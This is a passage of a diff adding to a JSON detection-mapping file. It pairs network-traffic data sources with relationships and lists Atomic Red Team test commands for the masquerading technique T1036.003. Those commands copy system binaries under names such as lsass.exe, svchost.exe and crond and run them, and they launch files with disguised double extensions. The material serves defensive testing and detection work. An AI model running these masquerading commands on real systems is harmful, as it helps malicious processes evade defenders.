+ "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage", + null + ] + }, + { + "technique_id": "T1036.003", + "command_list": [ + "copy %SystemRoot%\\System32\\cmd.exe %SystemRoot%\\Temp\\lsass.exe\n%SystemRoot%\\Temp\\lsass.exe /B\n", + "cp /bin/sh /tmp/crond;\necho 'sleep 5' | /tmp/crond\n", + "copy %SystemRoot%\\System32\\cscript.exe %APPDATA%\\notepad.exe /Y\ncmd.exe /c %APPDATA%\\notepad.exe /B\n", + "copy %SystemRoot%\\System32\\wscript.exe %APPDATA%\\svchost.exe /Y\ncmd.exe /c %APPDATA%\\svchost.exe /B\n", + "copy %windir%\\System32\\windowspowershell\\v1.0\\powershell.exe %APPDATA%\\taskhostw.exe /Y\ncmd.exe /K %APPDATA%\\taskhostw.exe\n", + "copy #{inputfile} ($env:TEMP + \"\\svchost.exe\")\n$myT1036_003 = (Start-Process -PassThru -FilePath ($env:TEMP + \"\\svchost.exe\")).Id\nStop-Process -ID $myT1036_003\n", + "copy PathToAtomicsFolder\\T1036.003\\bin\\T1036.003.exe #{outputfile}\n$myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id\nStop-Process -ID $myT1036_003\n", + "copy $env:ComSpec #{outputfile}\n$myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id\nStop-Process -ID $myT1036_003\n", + "copy C:\\Windows\\System32\\cmd.exe C:\\lsm.exe\nC:\\lsm.exe /c echo T1036.003 > C:\\T1036.003.txt\n", + "copy C:\\Windows\\System32\\calc.exe %temp%\\T1036.003_masquerading.docx.exe /Y\ncopy C:\\Windows\\System32\\calc.exe %temp%\\T1036.003_masquerading.pdf.exe /Y\ncopy C:\\Windows\\System32\\calc.exe %temp%\\T1036.003_masquerading.ps1.exe /Y\ncopy #{vbs_path} %temp%\\T1036.003_masquerading.xls.vbs /Y\ncopy #{vbs_path} %temp%\\T1036.003_masquerading.xlsx.vbs /Y\ncopy #{vbs_path} %temp%\\T1036.003_masquerading.png.vbs /Y\ncopy #{ps1_path} %temp%\\T1036.003_masquerading.doc.ps1 /Y\ncopy #{ps1_path} %temp%\\T1036.003_masquerading.pdf.ps1 /Y\ncopy #{ps1_path} %temp%\\T1036.003_masquerading.rtf.ps1 /Y\n%temp%\\T1036.003_masquerading.docx.exe\n%temp%\\T1036.003_masquerading.pdf.exe\n%temp%\\T1036.003_masquerading.ps1.exe\n%temp%\\T1036.003_masquerading.xls.vbs\n%temp%\\T1036.003_masquerading.xlsx.vbs\n%temp%\\T1036.003_masquerading.png.vbs\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.doc.ps1\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.pdf.ps1\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.rtf.ps1\n", + "copy #{exe_path} %temp%\\T1036.003_masquerading.docx.exe /Y\ncopy #{exe_path} %temp%\\T1036.003_masquerading.pdf.exe /Y\ncopy #{exe_path} %temp%\\T1036.003_masquerading.ps1.exe /Y\ncopy PathToAtomicsFolder\\T1036.003\\src\\T1036.003_masquerading.vbs %temp%\\T1036.003_masquerading.xls.vbs /Y\ncopy PathToAtomicsFolder\\T1036.003\\src\\T1036.003_masquerading.vbs %temp%\\T1036.003_masquerading.xlsx.vbs /Y\ncopy PathToAtomicsFolder\\T1036.003\\src\\T1036.003_masquerading.vbs %temp%\\T1036.003_masquerading.png.vbs /Y\ncopy #{ps1_path} %temp%\\T1036.003_masquerading.doc.ps1 /Y\ncopy #{ps1_path} %temp%\\T1036.003_masquerading.pdf.ps1 /Y\ncopy #{ps1_path} %temp%\\T1036.003_masquerading.rtf.ps1 /Y\n%temp%\\T1036.003_masquerading.docx.exe\n%temp%\\T1036.003_masquerading.pdf.exe\n%temp%\\T1036.003_masquerading.ps1.exe\n%temp%\\T1036.003_masquerading.xls.vbs\n%temp%\\T1036.003_masquerading.xlsx.vbs\n%temp%\\T1036.003_masquerading.png.vbs\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.doc.ps1\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.pdf.ps1\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.rtf.ps1\n", + "copy #{exe_path} %temp%\\T1036.003_masquerading.docx.exe /Y\ncopy #{exe_path} %temp%\\T1036.003_masquerading.pdf.exe /Y\ncopy #{exe_path} %temp%\\T1036.003_masquerading.ps1.exe /Y\ncopy #{vbs_path} %temp%\\T1036.003_masquerading.xls.vbs /Y\ncopy #{vbs_path} %temp%\\T1036.003_masquerading.xlsx.vbs /Y\ncopy #{vbs_path} %temp%\\T1036.003_masquerading.png.vbs /Y\ncopy PathToAtomicsFolder\\T1036.003\\src\\T1036.003_masquerading.ps1 %temp%\\T1036.003_masquerading.doc.ps1 /Y\ncopy PathToAtomicsFolder\\T1036.003\\src\\T1036.003_masquerading.ps1 %temp%\\T1036.003_masquerading.pdf.ps1 /Y\ncopy PathToAtomicsFolder\\T1036.003\\src\\T1036.003_masquerading.ps1 %temp%\\T1036.003_masquerading.rtf.ps1 /Y\n%temp%\\T1036.003_masquerading.docx.exe\n%temp%\\T1036.003_masquerading.pdf.exe\n%temp%\\T1036.003_masquerading.ps1.exe\n%temp%\\T1036.003_masquerading.xls.vbs\n%temp%\\T1036.003_masquerading.xlsx.vbs\n%temp%\\T1036.003_masquerading.png.vbs\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.doc.ps1\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.pdf.ps1\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.rtf.ps1\n" + ], + "commands": [ + { + "command": "copy %SystemRoot%\\System32\\cmd.exe %SystemRoot%\\Temp\\lsass.exe\n%SystemRoot%\\Temp\\lsass.exe /B\n", + "source": "atomics/T1036.003/T1036.003.yaml", + "name": "Atomic Red Team Test - Masquerading: Rename System Utilities" + }, + { + "command": "cp /bin/sh /tmp/crond;\necho 'sleep 5' | /tmp/crond\n", + "source": "atomics/T1036.003/T1036.003.yaml", + "name": "Atomic Red Team Test - Masquerading: Rename System Utilities" + }, + { + "command": "copy %SystemRoot%\\System32\\cscript.exe %APPDATA%\\notepad.exe /Y\ncmd.exe /c %APPDATA%\\notepad.exe /B\n", + "source": "atomics/T1036.003/T1036.003.yaml", + "name": "Atomic Red Team Test - Masquerading: Rename System Utilities" + }, + { + "command": "copy %SystemRoot%\\System32\\wscript.exe %APPDATA%\\svchost.exe /Y\ncmd.exe /c %APPDATA%\\svchost.exe /B\n", + "source": "atomics/T1036.003/T1036.003.yaml", + "name": "Atomic Red Team Test - Masquerading: Rename System Utilities" + }, + { + "command": "copy %windir%\\System32\\windowspowershell\\v1.0\\powershell.exe %APPDATA%\\taskhostw.exe /Y\ncmd.exe /K %APPDATA%\\taskhostw.exe\n", + "source": "atomics/T1036.003/T1036.003.yaml", + "name": "Atomic Red Team Test - Masquerading: Rename System Utilities" + }, + { + "command": "copy #{inputfile} ($env:TEMP + \"\\svchost.exe\")\n$myT1036_003 = (Start-Process -PassThru -FilePath ($env:TEMP + \"\\svchost.exe\")).Id\nStop-Process -ID $myT1036_003\n", + "source": "atomics/T1036.003/T1036.003.yaml", + "name": "Atomic Red Team Test - Masquerading: Rename System Utilities" + }, + { + "command": "copy PathToAtomicsFolder\\T1036.003\\bin\\T1036.003.exe #{outputfile}\n$myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id\nStop-Process -ID $myT1036_003\n", + "source": "atomics/T1036.003/T1036.003.yaml", + "name": "Atomic Red Team Test - Masquerading: Rename System Utilities" + }, + { + "command": "copy $env:ComSpec #{outputfile}\n$myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id\nStop-Process -ID $myT1036_003\n", + "source": "atomics/T1036.003/T1036.003.yaml", + "name": "Atomic Red Team Test - Masquerading: Rename System Utilities" + }, + { + "command": "copy C:\\Windows\\System32\\cmd.exe C:\\lsm.exe\nC:\\lsm.exe /c echo T1036.003 > C:\\T1036.003.txt\n", + "source": "atomics/T1036.003/T1036.003.yaml", + "name": "Atomic Red Team Test - Masquerading: Rename System Utilities" + }, + { + "command": "copy C:\\Windows\\System32\\calc.exe %temp%\\T1036.003_masquerading.docx.exe /Y\ncopy C:\\Windows\\System32\\calc.exe %temp%\\T1036.003_masquerading.pdf.exe /Y\ncopy C:\\Windows\\System32\\calc.exe %temp%\\T1036.003_masquerading.ps1.exe /Y\ncopy #{vbs_path} %temp%\\T1036.003_masquerading.xls.vbs /Y\ncopy #{vbs_path} %temp%\\T1036.003_masquerading.xlsx.vbs /Y\ncopy #{vbs_path} %temp%\\T1036.003_masquerading.png.vbs /Y\ncopy #{ps1_path} %temp%\\T1036.003_masquerading.doc.ps1 /Y\ncopy #{ps1_path} %temp%\\T1036.003_masquerading.pdf.ps1 /Y\ncopy #{ps1_path} %temp%\\T1036.003_masquerading.rtf.ps1 /Y\n%temp%\\T1036.003_masquerading.docx.exe\n%temp%\\T1036.003_masquerading.pdf.exe\n%temp%\\T1036.003_masquerading.ps1.exe\n%temp%\\T1036.003_masquerading.xls.vbs\n%temp%\\T1036.003_masquerading.xlsx.vbs\n%temp%\\T1036.003_masquerading.png.vbs\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.doc.ps1\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.pdf.ps1\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.rtf.ps1\n", + "source": "atomics/T1036.003/T1036.003.yaml", + "name": "Atomic Red Team Test - Masquerading: Rename System Utilities" + }, + { + "command": "copy #{exe_path} %temp%\\T1036.003_masquerading.docx.exe /Y\ncopy #{exe_path} %temp%\\T1036.003_masquerading.pdf.exe /Y\ncopy #{exe_path} %temp%\\T1036.003_masquerading.ps1.exe /Y\ncopy PathToAtomicsFolder\\T1036.003\\src\\T1036.003_masquerading.vbs %temp%\\T1036.003_masquerading.xls.vbs /Y\ncopy PathToAtomicsFolder\\T1036.003\\src\\T1036.003_masquerading.vbs %temp%\\T1036.003_masquerading.xlsx.vbs /Y\ncopy PathToAtomicsFolder\\T1036.003\\src\\T1036.003_masquerading.vbs %temp%\\T1036.003_masquerading.png.vbs /Y\ncopy #{ps1_path} %temp%\\T1036.003_masquerading.doc.ps1 /Y\ncopy #{ps1_path} %temp%\\T1036.003_masquerading.pdf.ps1 /Y\ncopy #{ps1_path} %temp%\\T1036.003_masquerading.rtf.ps1 /Y\n%temp%\\T1036.003_masquerading.docx.exe\n%temp%\\T1036.003_masquerading.pdf.exe\n%temp%\\T1036.003_masquerading.ps1.exe\n%temp%\\T1036.003_masquerading.xls.vbs\n%temp%\\T1036.003_masquerading.xlsx.vbs\n%temp%\\T1036.003_masquerading.png.vbs\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.doc.ps1\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.pdf.ps1\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.rtf.ps1\n", + "source": "atomics/T1036.003/T1036.003.yaml", + "name": "Atomic Red Team Test - Masquerading: Rename System Utilities" + }, + { + "command": "copy #{exe_path} %temp%\\T1036.003_masquerading.docx.exe /Y\ncopy #{exe_path} %temp%\\T1036.003_masquerading.pdf.exe /Y\ncopy #{exe_path} %temp%\\T1036.003_masquerading.ps1.exe /Y\ncopy #{vbs_path} %temp%\\T1036.003_masquerading.xls.vbs /Y\ncopy #{vbs_path} %temp%\\T1036.003_masquerading.xlsx.vbs /Y\ncopy #{vbs_path} %temp%\\T1036.003_masquerading.png.vbs /Y\ncopy PathToAtomicsFolder\\T1036.003\\src\\T1036.003_masquerading.ps1 %temp%\\T1036.003_masquerading.doc.ps1 /Y\ncopy PathToAtomicsFolder\\T1036.003\\src\\T1036.003_masquerading.ps1 %temp%\\T1036.003_masquerading.pdf.ps1 /Y\ncopy PathToAtomicsFolder\\T1036.003\\src\\T1036.003_masquerading.ps1 %temp%\\T1036.003_masquerading.rtf.ps1 /Y\n%temp%\\T1036.003_masquerading.docx.exe\n%temp%\\T1036.003_masquerading.pdf.exe\n%temp%\\T1036.003_masquerading.ps1.exe\n%temp%\\T1036.003_masquerading.xls.vbs\n%temp%\\T1036.003_masquerading.xlsx.vbs\n%temp%\\T1036.003_masquerading.png.vbs\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.doc.ps1\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.pdf.ps1\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.rtf.ps1\n", + "source": "atomics/T1036.003/T1036.003.yaml", + "name": "Atomic Red Team Test - Masquerading: Rename System Utilities" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1036.003", + "display_name": "Masquerading: Rename System Utilities", + "atomic_tests": [ + { + "name": "Masquerading as Windows LSASS process", + "auto_generated_guid": "5ba5a3d1-cf3c-4499-968a-a93155d1f717", + "description": "Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe.\n\nUpon execution, cmd will be launched by powershell. If using Invoke-AtomicTest, The test will hang until the 120 second timeout cancels the session\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "copy %SystemRoot%\\System32\\cmd.exe %SystemRoot%\\Temp\\lsass.exe\n%SystemRoot%\\Temp\\lsass.exe /B\n", + "cleanup_command": "del /Q /F %SystemRoot%\\Temp\\lsass.exe >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Masquerading as Linux crond process.", + "auto_generated_guid": "a315bfff-7a98-403b-b442-2ea1b255e556", + "description": "Copies sh process, renames it as crond, and executes it to masquerade as the cron daemon.\n\nUpon successful execution, sh is renamed to `crond` and executed.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "cp /bin/sh /tmp/crond;\necho 'sleep 5' | /tmp/crond\n", + "cleanup_command": "rm /tmp/crond\n", + "name": "sh" + } + }, + { + "name": "Masquerading - cscript.exe running as notepad.exe", + "auto_generated_guid": "3a2a578b-0a01-46e4-92e3-62e2859b42f0", + "description": "Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe.\n\nUpon successful execution, cscript.exe is renamed as notepad.exe and executed from non-standard path.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "copy 